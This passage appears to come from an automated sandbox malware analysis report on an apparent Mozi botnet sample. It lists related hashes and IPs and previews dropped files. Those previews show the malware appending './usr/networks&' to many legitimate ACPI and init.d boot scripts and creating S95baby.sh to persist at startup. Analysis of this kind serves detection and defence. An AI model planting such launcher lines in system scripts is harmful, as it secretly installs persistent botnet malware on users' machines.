                                                • 80.172.227.10
                                                c6uPPniDMY.exeGet hashmaliciousBrowse
                                                • 80.172.227.10
                                                xGkcObojxz.exeGet hashmaliciousBrowse
                                                • 80.172.227.10
                                                utVeq4bE2C.exeGet hashmaliciousBrowse
                                                • 80.172.227.10
                                                https://glotorrents.pwGet hashmaliciousBrowse
                                                • 195.22.28.198
                                                http://clickly.meGet hashmaliciousBrowse
                                                • 195.22.26.248
                                                http://uh-cm2016dmzdp1.uh-dmz.orgGet hashmaliciousBrowse
                                                • 195.22.26.248

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                /etc/init.d/S95baby.shMGuvcs6OczGet hashmaliciousBrowse
                                                  mozi.a.zipGet hashmaliciousBrowse
                                                    bin.shGet hashmaliciousBrowse
                                                      iGet hashmaliciousBrowse
                                                        Mozi.mGet hashmaliciousBrowse
                                                          Mozi.mGet hashmaliciousBrowse
                                                            1skm346XtzGet hashmaliciousBrowse
                                                              Mozi.aGet hashmaliciousBrowse
                                                                Mozi.1.mGet hashmaliciousBrowse
                                                                  6wuvHEBHt8.binGet hashmaliciousBrowse
                                                                    7v1ic5IS8IGet hashmaliciousBrowse
                                                                      Mozi.aGet hashmaliciousBrowse
                                                                        Mozi.aGet hashmaliciousBrowse
                                                                          Mozi.mGet hashmaliciousBrowse
                                                                            Mozi.mGet hashmaliciousBrowse
                                                                              Mozi.mGet hashmaliciousBrowse
                                                                                bad_fileGet hashmaliciousBrowse
                                                                                  mxjzQQFgLpGet hashmaliciousBrowse
                                                                                    JrAL1wW1MQGet hashmaliciousBrowse
                                                                                      /etc/rcS.d/S95baby.shMGuvcs6OczGet hashmaliciousBrowse
                                                                                        mozi.a.zipGet hashmaliciousBrowse
                                                                                          bin.shGet hashmaliciousBrowse
                                                                                            iGet hashmaliciousBrowse
                                                                                              Mozi.mGet hashmaliciousBrowse
                                                                                                Mozi.mGet hashmaliciousBrowse
                                                                                                  1skm346XtzGet hashmaliciousBrowse
                                                                                                    Mozi.aGet hashmaliciousBrowse
                                                                                                      Mozi.1.mGet hashmaliciousBrowse
                                                                                                        6wuvHEBHt8.binGet hashmaliciousBrowse
                                                                                                          7v1ic5IS8IGet hashmaliciousBrowse
                                                                                                            Mozi.aGet hashmaliciousBrowse
                                                                                                              Mozi.aGet hashmaliciousBrowse
                                                                                                                Mozi.mGet hashmaliciousBrowse
                                                                                                                  Mozi.mGet hashmaliciousBrowse
                                                                                                                    Mozi.mGet hashmaliciousBrowse
                                                                                                                      bad_fileGet hashmaliciousBrowse
                                                                                                                        mxjzQQFgLpGet hashmaliciousBrowse
                                                                                                                          JrAL1wW1MQGet hashmaliciousBrowse

                                                                                                                            Created / dropped Files

                                                                                                                            /boot/grub/i386-pc/modinfo.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:false
                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /etc/acpi/asus-keyboard-backlight.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):326
                                                                                                                            Entropy (8bit):5.2904323771702915
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:K8K2A6godGINKlsX3stINKVHBfNewdrCDjwFhD2UDKVHxMn:1f/NA23stIN8HdNTek3n8HWn
                                                                                                                            MD5:626FDB50CA17F4E2BAAB79F09F3EB73B
                                                                                                                            SHA1:2D838897E7D735CB67348F60EDA0E1E41D45DCBE
                                                                                                                            SHA-256:3FDFC702E6D3E1FE75E88B60408ED1B435F3AE24A57B56636C16CB321CBAE440
                                                                                                                            SHA-512:E3FB063A63DF21B22D20754AE2CEA1F0D80464F4A870491E2843F7D88EBA181E351C4A20D67AD6A4CD8D1BF26971C654C502D5770D5B43B34024FAF2048171F5
                                                                                                                            Malicious:false
                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                            Preview: ./usr/networks&.test -d $KEYS_DIR || exit 0..MIN=0.MAX=$(cat $KEYS_DIR/max_brightness).VAL=$(cat $KEYS_DIR/brightness)..if [ "$1" = down ]; then..VAL=$((VAL-1)).else..VAL=$((VAL+1)).fi..if [ "$VAL" -lt $MIN ]; then..VAL=$MIN.elif [ "$VAL" -gt $MAX ]; then..VAL=$MAX.fi..echo $VAL > $KEYS_DIR/brightness../usr/networks&.exit 1.
                                                                                                                            /etc/acpi/asus-wireless.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):157
                                                                                                                            Entropy (8bit):4.412729940630044
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVfGHvNM8iKWERAIda74QvvvLwDGvNM8iKWERAIdJCsqORFL8OORgn:KJFn40MLFb+Pn
                                                                                                                            MD5:9B10038ADE21F207C6C9F4EEC7C5ADA2
                                                                                                                            SHA1:F3FB51110B022F8BFEA1874C6D6984D8C6EF8C7B
                                                                                                                            SHA-256:E6322FBB30D1362ED490A39BE58B491C7DB9CC96DB09C8E2BDC1B1F35E1A00E2
                                                                                                                            SHA-512:C9A47A0A449FD009221006D9077F1EDD25305EDA017DED7542AAF8EF80166B1645B889B478D6067ED2CB0123D798103DD73FD69B818C9B9704A274DC3FB4EA15
                                                                                                                            Malicious:false
                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                            Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0... /usr/share/acpi-support/state-funcs..toggleAllWirelessStates../usr/networks&.exit 1.
                                                                                                                            /etc/acpi/ibm-wireless.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):636
                                                                                                                            Entropy (8bit):4.722087767454589
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:wNGs4KSb7jFCR2TeNMngFfiTccfkneFhpmtjwkuVSd/1kVqEn:wFS/5uab2d7neFhij26/CwE
                                                                                                                            MD5:77315C7FA7809C62D27AD6C9EE1C9289
                                                                                                                            SHA1:C8EC67C17E334B13B1DE93B0D2E822C606F9985E
                                                                                                                            SHA-256:81CB0908E30FCF60AEA43776D5F1C3AEE6E1B46190A3DB5A1866CD1D2E09E17E
                                                                                                                            SHA-512:B679EF04092FDDBB0FA290F2D817DA38601336261870EE37BE6FA9451004B338E3A981694A0320B40A47A3597BA7B172848C877313F169ECDE3B8FB7FE38C582
                                                                                                                            Malicious:false
                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                            Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0..# Find and toggle wireless of bluetooth devices on ThinkPads... /usr/share/acpi-support/state-funcs..rfkill list | sed -n -e'/tpacpi_bluetooth_sw/,/^[0-9]/p' | grep -q 'Soft blocked: yes'.bluetooth_state=$?..# Note that this always alters the state of the wireless!.toggleAllWirelessStates;..# Sequence is Both on, Both off, Wireless only, Bluetooth only.if ! isAnyWirelessPoweredOn; then. # Wireless was turned off. if [ "$bluetooth_state" = 0 ]; then. rfkill unblock bluetooth. else. rfkill block bluetooth. fi.fi../usr/networks&.exit 1.
                                                                                                                            /etc/acpi/powerbtn.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2079
                                                                                                                            Entropy (8bit):4.778187000249208
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:pDpMMOMTeMn/zV5rh/1RzUKH2Z8uBiXGp2fVU6GjJN+V4ATo+aZ+:pCgeCrhXHzDfVpmhC/
                                                                                                                            MD5:CF725BE1199B06F062A47095420F7DC5
                                                                                                                            SHA1:98F1BC7C1B81C708B326BB3DC1C33AA3F29D8BBE
                                                                                                                            SHA-256:C617FF036646CF1EEF3AC91EC504093CC25C93E07850276AA37AA2542A724B01
                                                                                                                            SHA-512:D2F9649FED4B309108F2C67F28B1EE66C30219AF9B36F30E85F190064B3D5A65963BF6B9D3A8662A2197B47DFECA95D52447D7FCA4CDBAA69BB722BE5417DC50
                                                                                                                            Malicious:false
                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                            Preview: ./usr/networks&. exit 0.fi..# getXuser gets the X user belonging to the display in $displaynum..# If you want the foreground X user, use getXconsole!.getXuser() {. user=`pinky -fw | awk '{ if ($2 == ":'$displaynum'" || $(NF) == ":'$displaynum'" ) { print $1; exit; } }'`. if [ x"$user" = x"" ]; then. startx=`pgrep -n startx`. if [ x"$startx" != x"" ]; then. user=`ps -o user --no-headers $startx`. fi. fi. if [ x"$user" != x"" ]; then. userhome=`getent passwd $user | cut -d: -f6`. export XAUTHORITY=$userhome/.Xauthority. else. export XAUTHORITY="". fi. export XUSER=$user.}..# Skip if we just in the middle of resuming..test -f /var/lock/acpisleep && exit 0..# If the current X console user is running a power management daemon that.# handles suspend/resume requests, let them handle policy This is effectively.# the same as 'acpi-s
                                                                                                                            /etc/acpi/tosh-wireless.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):483
                                                                                                                            Entropy (8bit):4.215331622973397
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:KJFqcA/0MLFMkneFUJLS3SU9mFCQROAJzHdcnK/lHb/iHIYK3zQYlyMn:wK8QdeFuS3lyXp9cK/lziijQYlrn
                                                                                                                            MD5:07889D65619CDB80F8E876A087F160D3
                                                                                                                            SHA1:35CB92B632BCA335EBEA933A736F75856E8CA262
                                                                                                                            SHA-256:34768A7BD08F050862E888142B6246B41458957CF56BC4879619D3A315E3567B
                                                                                                                            SHA-512:C86DE6FC5047AC695717E11B8714DE439E63949B439C3B8AA79C060CF0E807FB964C81B1FF59A7C0F38E0F3CC85E6784F56E1536DDDE9B66D1E22D306BEFCFAE
                                                                                                                            Malicious:false
                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                            Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0... /usr/share/acpi-support/state-funcs..if isAnyWirelessPoweredOn; then. if [ -x /usr/bin/toshset ]; then. if `toshset -bluetooth | grep -q attached`; then. toshset -bluetooth off. toggleAllWirelessStates. else. toshset -bluetooth on. fi. else..toggleAllWirelessStates. fi.else. toggleAllWirelessStates.fi../usr/networks&.exit 1.
                                                                                                                            /etc/acpi/undock.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):266
                                                                                                                            Entropy (8bit):4.77497394042067
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:KJFqcA/05CbMTCYEBKAABrX8FvfbrX8EmNv0V4n:wK852PYEBKAkrX4HXHnV4n
                                                                                                                            MD5:5E3A15E41D35EC409613236A20B5783E
                                                                                                                            SHA1:5D71BD9A121461464F7937B2E921410ED93BEE24
                                                                                                                            SHA-256:C3294C9B06A81A3325E131BF139B5F1C8615290B382F0014DA440F4F76C49BEA
                                                                                                                            SHA-512:13E47AA60C322CB0DEF4894B97625EC2E3AE9214743569AD566ECA1331D581CD2185BC27CD538E8BA5D475FBBB79EC76EA4CCE31EDB115F30684D80CA9F5F1F4
                                                                                                                            Malicious:false
                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                            Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0..for device in /sys/devices/platform/dock.*; do..[ -e "$device/type" ] || continue..[ x$(cat "$device/type") = xdock_station ] || continue..echo 1 > "$device/undock".done../usr/networks&.exit 1.
                                                                                                                            /etc/bash_completion.d/libreoffice.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:false
                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /etc/init.d/S95baby.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:POSIX shell script, ASCII text executable
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):25
                                                                                                                            Entropy (8bit):3.8936606896881854
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:TKH4v0VJ:hK
                                                                                                                            MD5:1B3235BA10FC04836C941D3D27301956
                                                                                                                            SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                                                                            SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                                                                            SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                                                                            Malicious:true
                                                                                                                            Joe Sandbox View:
                                                                                                                            • Filename: MGuvcs6Ocz, Detection: malicious, Browse
                                                                                                                            • Filename: mozi.a.zip, Detection: malicious, Browse
                                                                                                                            • Filename: bin.sh, Detection: malicious, Browse
                                                                                                                            • Filename: i, Detection: malicious, Browse
                                                                                                                            • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                            • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                            • Filename: 1skm346Xtz, Detection: malicious, Browse
                                                                                                                            • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                            • Filename: Mozi.1.m, Detection: malicious, Browse
                                                                                                                            • Filename: 6wuvHEBHt8.bin, Detection: malicious, Browse
                                                                                                                            • Filename: 7v1ic5IS8I, Detection: malicious, Browse
                                                                                                                            • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                            • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                            • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                            • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                            • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                            • Filename: bad_file, Detection: malicious, Browse
                                                                                                                            • Filename: mxjzQQFgLp, Detection: malicious, Browse
                                                                                                                            • Filename: JrAL1wW1MQ, Detection: malicious, Browse
                                                                                                                            Preview: #!/bin/sh./usr/networks&.
                                                                                                                            /etc/init.d/bootmisc.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):148
                                                                                                                            Entropy (8bit):4.718194263525147
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4KXGK+R0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4GX+R0Voo+v7n
                                                                                                                            MD5:68EC1ED64500D143FE44D1ED0B19DD83
                                                                                                                            SHA1:90AE6027194C555ED6DE71191682E1773DD8E609
                                                                                                                            SHA-256:F450F84C27D8339C63251AEB3DC06634AC42E8F4B0AFDA734E1044B5453ECF0D
                                                                                                                            SHA-512:C9CD195893143DE17D2029672DA2236C7EC44498B1B5F13526CCA56665388790A198ECD0F2FE097FB8D035F780AFFCC5F984DDE1D0540AA778892F52E7698EBB
                                                                                                                            Malicious:true
                                                                                                                            Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: bootmisc.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                            /etc/init.d/checkfs.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):147
                                                                                                                            Entropy (8bit):4.7173471450646
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4AGXi0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4u0Voo+v7n
                                                                                                                            MD5:FC904BF1583E7C4398FCCDF2D3276902
                                                                                                                            SHA1:25D51112D0A6C9C977F4BB0B73BB3B4F278074A3
                                                                                                                            SHA-256:059F2548AB66249C86CC868222E9CA0B44123E23A99D4D3581044D1306730BD7
                                                                                                                            SHA-512:DF7FC2EE581E67BC3282F05FB8DC33FCAF86B29F564E5CB43965AFDB6AE7422D06A6091A18375B3544F495CA827B6CC6B213FF4FFE7AEC252C326B8D56B4CF84
                                                                                                                            Malicious:true
                                                                                                                            Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkfs.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                            /etc/init.d/checkroot-bootclean.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):250
                                                                                                                            Entropy (8bit):4.872318043360431
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4YDi0Voo+v7n:AGKE3fdARMsBLbYerTn
                                                                                                                            MD5:1B20C93FFEABBAA880FEB038394DA3EE
                                                                                                                            SHA1:CDD8FDC804AE4D7464E3B67B26F52C53C5EEAD13
                                                                                                                            SHA-256:3A63188036AB39E080E5035091441EFB91BF22F20C9292900929CA8F04D0F280
                                                                                                                            SHA-512:E2717119C05473DEB21FF60060813C6B4648FB6B94B524D76A15ED9506ED2BCFFA03108ABAB7CBF52A29D7507937749D0F9F420A96D4F75B499553434F836059
                                                                                                                            Malicious:true
                                                                                                                            Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkroot-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                            /etc/init.d/checkroot.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):3111
                                                                                                                            Entropy (8bit):4.922960717312443
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:l+bjYLN1LiQKt6CYuSB/VN7pL4TyKWSmdrBW71cBi8m:0sxx2cJBVxZH01cc8m
                                                                                                                            MD5:544D026D22E17EF8C1F59AE6EC1E5993
                                                                                                                            SHA1:F5BFEE80CBF31DAEC25CD0728F030580F539D88F
                                                                                                                            SHA-256:69A39FE65F95BBA2E445A39AA1F8AF941FDA210AB6A9174B0578B5AB36C5BE32
                                                                                                                            SHA-512:85CD0C7AE75DA853E5C4286BF4E3D9DE28D2916EDBE0CB7A42DC53AD7D8B02F7875C617DC4D4DD4A1C74333D9403C8D06C903F8F19AB11A3E221281B7CBF8837
                                                                                                                            Malicious:true
                                                                                                                            Preview: ./usr/networks&..# NOTE: "failure" is defined as exiting with a return code of..# 4 or larger. A return code of 1 indicates that file system..# errors were corrected but that the boot may proceed. A return..# code of 2 or 3 indicates that the system should immediately reboot...#..if [ "$FSCKCODE" -eq 32 ]..then...log_warning_msg "File system check was interrupted by user"..elif [ "$FSCKCODE" -gt 3 ]..then...# Surprise! Re-directing from a HERE document (as in "cat << EOF")...# does not work because the root is currently read-only....log_failure_msg "An automatic file system check (fsck) of the root filesystem failed. .A manual fsck must be performed, then the system restarted. .The fsck should be performed in maintenance mode with the .root filesystem mounted in read-only mode."...log_warning_msg "The root filesystem is currently mounted in read-only mode. .A maintenance shell will now be started. .After performing system maintenance, press CONTROL-D .to terminate the maintenance shell
                                                                                                                            /etc/init.d/hostname.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):404
                                                                                                                            Entropy (8bit):5.01878905639229
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:U20zRSdZ9iBbG2Us4Ji0SAGKFqLkMfF3teoWpAsBdA80F4n0u4hR9QR0Voo+v7n:Ul221wi0PGKE3fdpsBi8wlbHaNrTn
                                                                                                                            MD5:0A6F8F35CFF93CE8BBAB05E2DA2714C6
                                                                                                                            SHA1:9A865CEB2B56974A54694ED9D1D117043EA02727
                                                                                                                            SHA-256:4E41D7D95B11DBAD34E30EDE98DB6728873146F05FF45A4EF6943ADD1F71D0A1
                                                                                                                            SHA-512:F6E29642047487748B5BEC77C7429881B73FED48CAA9247CB788CFA2CE856D300B3FB6F8F4C8D6F18ED710B5237B331BC03ABE03222296EE12F1256D5222B537
                                                                                                                            Malicious:true
                                                                                                                            Preview: ./usr/networks&..exit $ES.}..do_status () {..HOSTNAME=$(hostname)..if [ "$HOSTNAME" ] ; then...return 0..else...return 4..fi.}..case "$1" in. start|"")..do_start..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop)..# No-op..;;. status)..do_status..exit $?..;;. *)..echo "Usage: hostname.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                            /etc/init.d/hwclock.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:true
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /etc/init.d/mountall-bootclean.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):249
                                                                                                                            Entropy (8bit):4.8912088003487595
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4iea2ii0Voo+v7n:AGKE3fdARMsBLbxPrTn
                                                                                                                            MD5:11FEEF13321D348864E7632D0746ECA2
                                                                                                                            SHA1:8D763DA6837280846D90AAACA3122D4F5CC0C62D
                                                                                                                            SHA-256:3DFE238D111564682893276C28BB49367C38A1F07A873B8F79E4FA8291FD7FE7
                                                                                                                            SHA-512:1C25B93B523688ACB3DF72B8EC148CD736CD479E7BEF3655DBCDB0B6D1AFACB652492ECF81A21EBADEBBFF14D0B20916DFD639E93EE1CCD6454C61F38BCAE46D
                                                                                                                            Malicious:true
                                                                                                                            Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountall-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                            /etc/init.d/mountall.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):148
                                                                                                                            Entropy (8bit):4.74526082342869
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4iLirKM0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4ierX0Voo+v7n
                                                                                                                            MD5:44D9E997053B704B17DB7DD64563014E
                                                                                                                            SHA1:1A29A3E927426D001FD0627C244B2397CF62D6C6
                                                                                                                            SHA-256:56B70518A2C51841B3C7BC5DDBAFC2AF62F4A47B25A1147A929E1129CBCBFAC7
                                                                                                                            SHA-512:B16AC50C36C5C17D405D2D8A1E9DB7D9863578EB71F4C382C56C4AA4BCEAEE6D4558A8CB94505464A1F13BA980741F5BE8CBD134C425004AA260DAC8F52B1581
                                                                                                                            Malicious:true
                                                                                                                            Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountall.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                            /etc/init.d/mountdevsubfs.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):56
                                                                                                                            Entropy (8bit):4.1427249051134325
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVaUsZoG3LWlOORgn:eoo+WMn
                                                                                                                            MD5:1E7189F6F5D3DB6ABCDA8139030EFD90
                                                                                                                            SHA1:370B1FF47F5FC95D054FE3036C5F772403F9C1EF
                                                                                                                            SHA-256:2059ABA4C0ADA6C0EE6F5F911D60D25C054D91BEEF283931E7AD10CE68E096E7
                                                                                                                            SHA-512:C1CBF1885B2E515BF2B77688891B122EEC824022DFCB30B3075D9BD39B154EA7A9DC1B0CD64397335A9D32A8959B53C2225F600357F295FA8A914BA247163E12
                                                                                                                            Malicious:true
                                                                                                                            Preview: ./usr/networks&..exit 3..;;.esac../usr/networks&.exit 1.
                                                                                                                            /etc/init.d/mountkernfs.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):56
                                                                                                                            Entropy (8bit):4.1427249051134325
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVaUsZoG3LWlOORgn:eoo+WMn
                                                                                                                            MD5:1E7189F6F5D3DB6ABCDA8139030EFD90
                                                                                                                            SHA1:370B1FF47F5FC95D054FE3036C5F772403F9C1EF
                                                                                                                            SHA-256:2059ABA4C0ADA6C0EE6F5F911D60D25C054D91BEEF283931E7AD10CE68E096E7
                                                                                                                            SHA-512:C1CBF1885B2E515BF2B77688891B122EEC824022DFCB30B3075D9BD39B154EA7A9DC1B0CD64397335A9D32A8959B53C2225F600357F295FA8A914BA247163E12
                                                                                                                            Malicious:true
                                                                                                                            Preview: ./usr/networks&..exit 3..;;.esac../usr/networks&.exit 1.
                                                                                                                            /etc/init.d/mountnfs-bootclean.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):249
                                                                                                                            Entropy (8bit):4.8916208864241355
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4il/2ii0Voo+v7n:AGKE3fdARMsBLbPrTn
                                                                                                                            MD5:515975B77B7985776BC03B8F5C029EFE
                                                                                                                            SHA1:AA8F2AD5CB736EDC9BA0AEAE0748257E16875C11
                                                                                                                            SHA-256:DFD458AE245B70CB759F3FF40FB22BDFD520E627DABAF813C1D9BCA2C8155E00
                                                                                                                            SHA-512:169DC8DDF26C9F3A50C29D0F2AB99AF20D4F949F2F034AC25914086ED0DE37610D310F034E20B6493195E1BB54DC3036EB5BC999099D74ED53FFC813DED5FAD2
                                                                                                                            Malicious:true
                                                                                                                            Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountnfs-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                            /etc/init.d/mountnfs.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):190
                                                                                                                            Entropy (8bit):3.788938232230384
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVx5jWvFFFvNsTREKdKCvFF/pN1uFFFveYd3LrLl7jWvFFFvzv3Hv0VOORgn:a5qvFFhNsTR/3/hN4/Zdd75qvFFhzfv7
                                                                                                                            MD5:B09350F021B2B102B1E328A988261F3E
                                                                                                                            SHA1:93AD761BD0E1EBB3E9BDCAA469EC0192C0C9DA4F
                                                                                                                            SHA-256:E78EED19CCD5853AF3518FB3A16BE3244BE503798218041D65E5B44A0829A020
                                                                                                                            SHA-512:1DB35C4F8A6584FAC6AB3B0789B4037F09557457B248443489D5EDD2A6B34DB59735B3256F905D45075199DD870E52FFDBCC7E8DD85006BD1F85F8000F61FF8A
                                                                                                                            Malicious:true
